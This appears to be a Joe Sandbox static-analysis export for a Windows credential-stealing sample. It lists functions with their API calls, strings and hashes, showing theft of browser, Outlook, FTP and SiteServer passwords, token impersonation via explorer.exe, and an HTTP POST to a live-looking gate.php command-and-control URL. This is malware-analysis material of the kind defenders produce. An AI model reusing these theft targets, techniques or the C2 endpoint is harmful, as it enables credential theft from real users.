Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

wsprintfA.USER32 ref: 0040AC14
wsprintfA.USER32 ref: 0040AC27
wsprintfA.USER32 ref: 0040AC3A
wsprintfA.USER32 ref: 0040AC4D
wsprintfA.USER32 ref: 0040AC60
wsprintfA.USER32 ref: 0040AC73
wsprintfA.USER32 ref: 0040AC86

Part of subcall function 0040AA8E: lstrlen.KERNEL32(?), ref: 0040AAA3

Part of subcall function 0040AA8E: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AB5B
Part of subcall function 0040AA8E: LocalFree.KERNEL32(00000000), ref: 0040AB8E

Part of subcall function 00401553: lstrlen.KERNEL32(00000000), ref: 0040155F

Strings

%s\Keychain, xrefs: 0040AC6B
SiteServer %d\WebUrl, xrefs: 0040AC1F
SiteServer %d-User PW, xrefs: 0040AC58
SiteServer %d\Remote Directory, xrefs: 0040AC32
SiteServer %d-User, xrefs: 0040AC45
SiteServer %d\SFTP, xrefs: 0040AC7E
SiteServer %d\Host, xrefs: 0040AC0C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 3846021373-1012938452
Opcode ID: 980e5504d8c115ad4e21079b8b69587aa3f2b5bb8ea418ef85d838cf9be7efe8
Instruction ID: 75919cae40a4d2d709e4aa0b5e63dbbe22f6960ca7ee49d7892696dfe970731f
Opcode Fuzzy Hash: 980e5504d8c115ad4e21079b8b69587aa3f2b5bb8ea418ef85d838cf9be7efe8
Instruction Fuzzy Hash: C0617932840209BBDF027F91DC06BED7E72AF04349F14803AF615341B2DB7A5A60EB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4AF Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A213: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A24C
Part of subcall function 0040A213: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A255

Part of subcall function 0040A25E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A29A
Part of subcall function 0040A25E: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2A3

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F4F8
lstrcmpiA.KERNEL32(?,identification), ref: 0040F578
lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F58D
lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F5B0
lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F5CF
lstrcmpiA.KERNEL32(?,identities), ref: 0040F5EE
757283B0.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F64F

Strings

inetcomm server passwords, xrefs: 0040F5A4
identities, xrefs: 0040F5E2
outlook account manager passwords, xrefs: 0040F5C3
identification, xrefs: 0040F56C
identitymgr, xrefs: 0040F581

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrcmpi$757283ByteCharMultiWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 70865654-4287852900
Opcode ID: b3ed34c4ef78ed893cb30f717b6821dbf54382717ddac9e1049adf005edbe619
Instruction ID: a0ab9d88b1f10c463517a237764fde3d1ce25513b77a4bf1dbd62d82b8744c41
Opcode Fuzzy Hash: b3ed34c4ef78ed893cb30f717b6821dbf54382717ddac9e1049adf005edbe619
Instruction Fuzzy Hash: 36416B3184021CBBEF219F50CD41FDA777ABB05304F0041BABA08751A1DB799AD9DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00402D99 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,explorer.exe), ref: 00402CE5
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe), ref: 00402D09
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402D33
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402D4B
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402D58
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D79
CloseHandle.KERNEL32(?), ref: 00402D9E
CloseHandle.KERNEL32(?,?), ref: 00402DA6
CloseHandle.KERNEL32(?), ref: 00402DB0
Process32Next.KERNEL32(?,00000128), ref: 00402DC2
CloseHandle.KERNEL32(?), ref: 00402DD2

Strings

explorer.exe, xrefs: 00402CD9

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: 2c3a6b3b18d1fcf3669920605c3fee46c97806abe90232a462653ee64428c0ca
Instruction ID: 61759fd9a12f878b3820a4f3c1b866933e0d6fabdd712de451ce6ca25805fb19
Opcode Fuzzy Hash: 2c3a6b3b18d1fcf3669920605c3fee46c97806abe90232a462653ee64428c0ca
Instruction Fuzzy Hash: 86213D30910118EADF229B61DD49BEEBBB5AF48344F5444B2E209B11D0DBB89E90DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9A6 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00402886: lstrlen.KERNEL32(?), ref: 004028BA

StrStrIA.SHLWAPI(?,004164F4), ref: 0040B9BA
lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B9DC

Strings

password_value, xrefs: 0040BA23
username_value, xrefs: 0040BA3D
CONSTRAINT, xrefs: 0040B9D3
origin_url, xrefs: 0040BA09

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: a8764ea77b61e29b8e5a6e4171f6d1d9797fc09401321421f18521d2bdc65dc3
Instruction ID: f685491af45cc0edf845bf23aec539453f18404267560d711e037803d2abf3a9
Opcode Fuzzy Hash: a8764ea77b61e29b8e5a6e4171f6d1d9797fc09401321421f18521d2bdc65dc3
Instruction Fuzzy Hash: 13112436610105BACF116B25ED029DE7E92EB553D8B108137F904A81E2E7FDC9D1DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403D4F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403DC2
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403DED
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403E33
wsprintfA.USER32 ref: 00403E58

Part of subcall function 00403D21: 6F7013D0.WSOCK32(00000000,0000FFFF,00000080,00000001,00000004), ref: 00403D46

lstrlen.KERNEL32(?,?,?,00000000,?,00001000,00001000,00001000,?,http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php), ref: 00403E83
closesocket.WSOCK32(?,?,?,00000000,?,?,?,00000000,?,00001000,00001000,00001000,?,http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php), ref: 00403ECE

Strings

http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php, xrefs: 00403D55
POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403E50

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateF7013Localclosesocketlstrlenwsprintf
String ID: POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)$http://assuredexpresscourierservice.com/ponzy/Panelnew/gate.php
API String ID: 2517972182-3868779159
Opcode ID: bb3e3b4fd3ec5c1ff5c88ca5596cb1cfdb1a3769d735cd724bc80ca0a184d7a3
Instruction ID: 99dd0531e5b50bd1ca442355d66483c78bf3825efe148b4941b465404c6eb75e
Opcode Fuzzy Hash: bb3e3b4fd3ec5c1ff5c88ca5596cb1cfdb1a3769d735cd724bc80ca0a184d7a3
Instruction Fuzzy Hash: A4411771D00209EADF11AFE1CC02BEEBF79AF0834AF10843AF510B51A1DBB95A55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409A2B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

profiles.ini, xrefs: 00409A7C
Path, xrefs: 00409AFA
Profile, xrefs: 00409ADB
IsRelative, xrefs: 00409B0E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: c317263945a844b6323ef6b7038bb48236796fd01312d34b7ada260587488d7a
Instruction ID: d49d151cd00c8449482fd7066ba74ba1d1f42644035631f5e2f7a3949e9f9dcd
Opcode Fuzzy Hash: c317263945a844b6323ef6b7038bb48236796fd01312d34b7ada260587488d7a
Instruction Fuzzy Hash: D4412C31A00145BADF22BB619C02EAE7F72AF40354F10857BF510741F2DBB99EA0AA0C

Uniqueness

Uniqueness Score: -1.00%

Function 004039E2 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

Part of subcall function 00401000: 756A4620.OLE32(00000000,00000001,?,?,00402094,?,?,?,?,004103E4), ref: 0040100E

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403A6A
lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403A7B
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403A9C
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403AB3
lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403AC4

Strings

Content-Length:, xrefs: 00403A62, 00403A76
Location:, xrefs: 00403AAB, 00403ABF

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$A4620AllocLocal
String ID: Content-Length:$Location:
API String ID: 1693019524-2400408565
Opcode ID: 5a81746410196628eacdf4b0b69d3752541f29e8998123741318a4ab2e9f68ba
Instruction ID: 1c31b5951b0d4a1fea606432ab76704204899d64c0837fce94a8943c545e2ffb
Opcode Fuzzy Hash: 5a81746410196628eacdf4b0b69d3752541f29e8998123741318a4ab2e9f68ba
Instruction Fuzzy Hash: 4741D731A00109BBDB10AFA5CC45F9EFF79EF84348F208177B510B62D2DB799E519A18

Uniqueness

Uniqueness Score: -1.00%

Function 004043D4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004043E2
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004043FA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040440B
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0040441A

Strings

kernel32.dll, xrefs: 004043DD
GetNativeSystemInfo, xrefs: 004043F4
IsWow64Process, xrefs: 00404405

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: d89bf223b516b2b5c3bf7b5c6859306d62a0f163648f40d30ca2940edfcde853
Instruction ID: a29710691b65247f7f358f9775bec8096cec6cfe148fbc4112c463d630bd321e
Opcode Fuzzy Hash: d89bf223b516b2b5c3bf7b5c6859306d62a0f163648f40d30ca2940edfcde853
Instruction Fuzzy Hash: 8BF0547275020566C710B6B95C85BDB3998ABC07A9F640477B301E32C1E9FCDDC156B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7BE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

value=", xrefs: 0040D849, 0040D85C
<setting name=", xrefs: 0040D80B, 0040D821

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 568c91be562d3e1df9af82e9fa7545178b2b982b68e4bc6011ef3cde071d8f43
Instruction ID: 64e65757d8a37c5a5f9911f77b1fa4fa96c74c21bc44b6a91aa3e6444326f239
Opcode Fuzzy Hash: 568c91be562d3e1df9af82e9fa7545178b2b982b68e4bc6011ef3cde071d8f43
Instruction Fuzzy Hash: 6231A472D042599EDF11BBA18C41AEE7FB09F19358F24807BF810B72A1D27C8A44D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401F85 Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401FA6
GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401FB3
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401FC7
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401FDC
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?), ref: 00401FEB
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401FF2
CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00402001

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 5402e36d897fe00d6c5eda343ae42a3c5a999aea72ee2717090a1a605893d8f0
Instruction ID: 70f0788b45e56b44b6f65b14faa8049f33ab5b7f6ec7609eed77a17493459cc4
Opcode Fuzzy Hash: 5402e36d897fe00d6c5eda343ae42a3c5a999aea72ee2717090a1a605893d8f0
Instruction Fuzzy Hash: 5E110C70280300BAFB313F758CC7F557A95AB11B18F208667B714BD1E6D6F9A8909B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00408642 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

https://, xrefs: 00408818
http://, xrefs: 00408807
ftp://, xrefs: 004087F6

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: f925647f1f0ea18c36a96e8f7c32391451ded1c47e08f317bdc124b70499a044
Instruction ID: 9617f7fa89dc7d90dcf64577492be8de2fb61544bb98ccf0a348361b01d63dae
Opcode Fuzzy Hash: f925647f1f0ea18c36a96e8f7c32391451ded1c47e08f317bdc124b70499a044
Instruction Fuzzy Hash: 7661E536800108FADF11AF91CD45AEEBBB9EF00348F10847AB941B51A1DB799B95DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E068 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

"/>, xrefs: 0040E0DA
winex=", xrefs: 0040E0B5, 0040E0CB

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: cb3e7aacaace6dc8c572e8db98ef2a31cb4e8caad440a50edb48dcac4a2a1b9c
Instruction ID: d7502f7128f9e22f9db50603c6b45870a41d1199c3b8ea06a20df3d29db1909c
Opcode Fuzzy Hash: cb3e7aacaace6dc8c572e8db98ef2a31cb4e8caad440a50edb48dcac4a2a1b9c
Instruction Fuzzy Hash: AA311E32D00119BADF12ABA2CC029EE7F76AF45344F108436F504BA1B1D77D4A61EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004080D7 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B2290,FTPCON), ref: 00408105
StrStrIA.SHLWAPI(006B25B0,FTP CONTROL,00000000,006B2290,FTPCON), ref: 00408111

Strings

\Profiles, xrefs: 00408125
FTP CONTROL, xrefs: 0040810B
.prf, xrefs: 00408136
FTPCON, xrefs: 004080FF

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: af7678ea54c6d7e83370da1709093329bd211e4838e9484d4a95d65fd3992d42
Instruction ID: 11fd9ce4be86486324026821f99b54408b2214f25c7d40684eee46501fa31574
Opcode Fuzzy Hash: af7678ea54c6d7e83370da1709093329bd211e4838e9484d4a95d65fd3992d42
Instruction Fuzzy Hash: E7019274600505B9EB116B21AE06FEF3A59DFC5354F24803BB980751E2DF7C5A92839C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DD4 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DF5
lstrlen.KERNEL32(?,?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401DFF
lstrcpy.KERNEL32(00000000,?), ref: 00401E13
lstrcat.KERNEL32(00000000,?), ref: 00401E1C

Strings

zHA, xrefs: 00401DEB
zHA, xrefs: 00401E21

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: zHA$zHA
API String ID: 2414487701-480364551
Opcode ID: ab86ba303397b9f2348f48aeaa521f6aefbf09b07a80a4300d47dbbe4f98d049
Instruction ID: 8b37fdabcf36789b156c54182cd8e00d2e5b157c566c2e2177da2ae7ce6b411f
Opcode Fuzzy Hash: ab86ba303397b9f2348f48aeaa521f6aefbf09b07a80a4300d47dbbe4f98d049
Instruction Fuzzy Hash: 4DF01D75100208BBDF007F62CCC5ADA3A99AB1439DF00D03AB90918162D7BDCAD4CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00401D80 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

zHA, xrefs: 00401D97
zHA, xrefs: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: zHA$zHA
API String ID: 2414487701-480364551
Opcode ID: 43a9188ad48df52fcd211765efbcd998f03af9dab7f5a4a44919339bc32caac1
Instruction ID: bac4a1e7535149610e86cff04dae95b0c1e00a8dfa7a2735dff3dc94aa57c328
Opcode Fuzzy Hash: 43a9188ad48df52fcd211765efbcd998f03af9dab7f5a4a44919339bc32caac1
Instruction Fuzzy Hash: F2F01C75100208BBDF007F62CCC1BAA3B98AB1436DF00D43AB91A19152D7BDC9D48B58

Uniqueness

Uniqueness Score: -1.00%

Function 004019AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

756D19A0.OLE32(?,?,?,?,0040FB47,?,het2563783920299393,?,?,?,?,?,?,?), ref: 004019C2
GlobalFix.KERNEL32(?), ref: 004019DD

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GlobalUnWire.KERNEL32(?), ref: 00401A05
lstrlen.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0040FB47,?,het2563783920299393,?), ref: 00401A0D

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

CRYPTED0YUI1.0, xrefs: 00401A3E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: GlobalLocal$AllocFreeWirelstrlen
String ID: CRYPTED0YUI1.0
API String ID: 165658394-1217275205
Opcode ID: d5b2edf301e0b19e7f9d926448e9ee749efd36a87a527b2f9109211bfae2f530
Instruction ID: e66fff3640afbef68db500a5f6a3419cd31f49da7f2248a0ca716e1f74be16f5
Opcode Fuzzy Hash: d5b2edf301e0b19e7f9d926448e9ee749efd36a87a527b2f9109211bfae2f530
Instruction Fuzzy Hash: 4911997190010CBEDF02BFA2CC469DD7F76AF04348F00817AB915B51B2D77A9BA5AB58

